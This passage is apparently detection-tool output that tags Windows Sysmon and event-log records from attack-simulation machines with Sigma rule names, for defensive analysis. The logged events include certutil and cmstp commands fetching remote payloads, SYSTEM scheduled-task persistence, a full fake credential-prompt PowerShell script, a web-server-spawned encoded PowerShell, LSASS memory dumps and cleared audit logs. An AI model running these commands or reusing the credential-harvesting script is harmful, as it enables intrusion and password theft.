exit\",0,true);}","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6657-5D3F-0000-001029198D00","ParentProcessId":1808,"ProcessGuid":"747F3D96-6657-5D3F-0000-001011298D00","ProcessId":1004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:15.502"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4977,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:15.658168Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" 
","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ProcessId":7088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4978,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:20.238305Z"}},"Version":5}}}},{"detection":["Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1 
","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-665C-5D3F-0000-0010096B8D00","ParentProcessId":7088,"ProcessGuid":"747F3D96-665C-5D3F-0000-0010E37B8D00","ProcessId":4520,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:20.410"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4980,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:20.459065Z"}},"Version":5}}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.2.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=89030EB0DE2B856B47105CA67DAAC722ABAF0BDF,MD5=D9818B3C3BC0AF0A5374C71272581C08,SHA256=DB3F360BDB292C0679C13149AC6F454F7DCE768BDE559D87CE718023A6985A0D,IMPHASH=109BA8ED3C458360A74EA1216207CA09","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c cmstp.exe /ni /s 
https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6661-5D3F-0000-00107AB88D00","ParentProcessId":6428,"ProcessGuid":"747F3D96-6661-5D3F-0000-0010CBC88D00","ProcessId":6820,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:25.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4985,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:25.659355Z"}},"Version":5}}}},{"detection":["Indirect Command Execution"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\calc.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"forfiles /p c:\\windows\\system32 /m notepad.exe /c calc.exe","ParentImage":"C:\\Windows\\System32\\forfiles.exe","ParentProcessGuid":"747F3D96-6666-5D3F-0000-0010AE068E00","ParentProcessId":1464,"ProcessGuid":"747F3D96-6666-5D3F-0000-0010DF098E00","ProcessId":4336,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:34:30.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4989,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:30.807635Z"}},"Version":5}}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ProcessId":2916,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:34:40.243"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5000,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:40.261289Z"}},"Version":5}}}},{"detection":["Suspicious Calculator Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Task Scheduler Configuration Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69","Image":"C:\\Windows\\System32\\schtasks.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c schtasks /create /tn \"mysc\" /tr C:\\windows\\system32\\calc.exe /sc ONLOGON /ru \"System\" /f","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6670-5D3F-0000-001099048F00","ParentProcessId":2916,"ProcessGuid":"747F3D96-6670-5D3F-0000-0010F9148F00","ProcessId":7076,"Product":"Microsoft® Windows® Operating System","RuleName":"Persistence - Scheduled Task Management","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 
21:34:40.755"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5002,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:34:40.889027Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":768617,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":796}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T19:28:17.594374Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"3B","SubjectLogonId":"0x4c331","SubjectUserName":"a-jbrown","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-1106"}}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AC38-5CB8-0000-0010365E0800","ProcessId":3576,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 16:56:24.833"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":14,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T16:56:24.893827Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /user","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Desktop\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-AB27-5CB8-0000-002021CA0000","LogonId":"0xca21","ParentCommandLine":"Powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-AC28-5CB8-0000-0010F3F70700","ParentProcessId":1200,"ProcessGuid":"365ABB72-AD19-5CB8-0000-0010F4F40C00","ProcessId":3980,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-18 17:00:09.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":24,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:00:09.977481Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.311","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced 
Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\sysmon.evtx.lnk","UtcTime":"2019-04-18 17:03:03.311"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":32,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:03:03.321806Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-18 17:03:03.441","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-AB28-5CB8-0000-0010F2E20000","ProcessId":1388,"RuleName":"technique_id=T1187,technique_name=Forced Authentication","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\HTools (vboxsrv) (D).lnk","UtcTime":"2019-04-18 17:03:03.441"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":33,"Execution":{"#attributes":{"ProcessID":3192,"ThreadID":3288}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-18T17:03:03.441979Z"}},"Version":2}}}},{"detection":["PowerShell Credential 
Prompt"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"","ScriptBlockId":"c7ca7056-b317-4fff-b796-05d8ef896dcd","ScriptBlockText":"function Invoke-LoginPrompt{\n$cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Please enter user credentials\", \"$env:userdomain\\$env:username\",\"\")\n$username = \"$env:username\"\n$domain = \"$env:userdomain\"\n$full = \"$domain\" + \"\\\" + \"$username\"\n$password = $cred.GetNetworkCredential().password\nAdd-Type -assemblyname System.DirectoryServices.AccountManagement\n$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\nwhile($DS.ValidateCredentials(\"$full\",\"$password\") -ne $True){\n $cred = $Host.ui.PromptForCredential(\"Windows Security\", \"Invalid Credentials, Please try again\", \"$env:userdomain\\$env:username\",\"\")\n $username = \"$env:username\"\n $domain = \"$env:userdomain\"\n $full = \"$domain\" + \"\\\" + \"$username\"\n $password = $cred.GetNetworkCredential().password\n Add-Type -assemblyname System.DirectoryServices.AccountManagement\n $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)\n $DS.ValidateCredentials(\"$full\", \"$password\") | out-null\n }\n $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password\n $output\n 
R{START_PROCESS}\n}\nInvoke-LoginPrompt"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"B5ABE6C2-675C-0001-A601-ACB55C67D501"}},"EventID":4104,"EventRecordID":1123,"Execution":{"#attributes":{"ProcessID":5500,"ThreadID":356}},"Keywords":"0x0","Level":3,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2019-09-09T13:35:09.315230Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"IEWIN7","Correlation":null,"EventID":1102,"EventRecordID":4987,"Execution":{"#attributes":{"ProcessID":824,"ThreadID":6060}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T19:27:55.274060Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"},"SubjectDomainName":"IEWIN7","SubjectLogonId":"0xffa8","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3583694148-1414552638-2922671848-1000"}}}}},{"detection":["Godmode Sigma Rule","Suspicious Encoded PowerShell Command Line","Shells Spawned by Web Servers"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -nop -noni -enc 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","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\Temp\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B26B-5CEA-0000-002023240800","LogonId":"0x82423","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-3251-5CEB-0000-00109E06E100","ParentProcessId":748,"ProcessGuid":"365ABB72-3D4A-5CEB-0000-0010FA93FD00","ProcessId":2584,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-27 01:28:42.700"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":5875,"Execution":{"#attributes":{"ProcessID":324,"ThreadID":2260}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-27T01:28:42.711005Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File","Procdump 
Usage"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 19:09:41.318","Image":"C:\\Users\\IEUser\\Desktop\\procdump.exe","ProcessGuid":"365ABB72-9B75-5C8E-0000-0010013F1200","ProcessId":1856,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Desktop\\lsass.exe_190317_120941.dmp","UtcTime":"2019-03-17 19:09:41.318"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4433,"Execution":{"#attributes":{"ProcessID":344,"ThreadID":2032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:09:41.328868Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","LSASS Memory Dump File Creation","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-03-17 19:10:02.058","Image":"C:\\Windows\\system32\\taskmgr.exe","ProcessGuid":"365ABB72-9B85-5C8E-0000-0010C4CC1200","ProcessId":3576,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\lsass (2).DMP","UtcTime":"2019-03-17 
19:10:02.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC04.example.corp","Correlation":null,"EventID":11,"EventRecordID":4441,"Execution":{"#attributes":{"ProcessID":344,"ThreadID":2032}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-03-17T19:10:03.991455Z"}},"Version":2}}}},{"detection":["WScript or CScript Dropper"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cscript c:\\ProgramData\\memdump.vbs notepad.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Console Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC","Image":"C:\\Windows\\System32\\cscript.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1B6A-5D69-0000-0020E5810E00","LogonId":"0xe81e5","ParentCommandLine":"C:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1B6C-5D69-0000-00106F060F00","ParentProcessId":2128,"ProcessGuid":"747F3D96-1C6F-5D69-0000-0010323C1F00","ProcessId":2576,"Product":"Microsoft ® Windows Script 